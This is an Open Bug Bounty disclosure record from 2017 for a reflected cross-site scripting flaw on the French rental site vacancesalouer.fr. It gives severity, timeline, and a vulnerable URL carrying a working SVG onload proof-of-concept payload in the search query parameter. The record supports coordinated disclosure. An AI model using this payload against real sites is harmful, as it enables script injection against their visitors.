vacancesalouer.fr XSS vulnerability

2017-12-21T03:42:00
ID OBB:456435
Type openbugbounty
Reporter Rashed_Naamani
Modified 2018-03-21T03:42:00

Description

Open Bug Bounty ID: OBB-456435

Description| Value
---|---
Affected Website:| vacancesalouer.fr
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.vacancesalouer.fr/advanced_search.php?query=%27%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29%3E&hide_advanced_option_by_user=0&continent=0&country=0&country_hidden=&region1=0&region2=0&minprice_input=&currency=4&price=7&maxprice_input=#_persons=1&start_date=&end_date=&acc_check%5B%5D=13&acc_check%5B%5D=14&acc_check%5B%5D=15&acc_check%5B%5D=16&acc_check%5B%5D=48&acc_check%5B%5D=49&acc_check%5B%5D=50&acc_check%5B%5D=52&acc_check%5B%5D=53

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 21 December, 2017 03:42 GMT
Vulnerability Verified:| 21 December, 2017 03:45 GMT
Website Operator Notified:| 21 December, 2017 03:45 GMT
Vulnerability Published:| 21 December, 2017 03:45 GMT [without any technical details]
Public Disclosure:| 21 March, 2018 03:42 GMT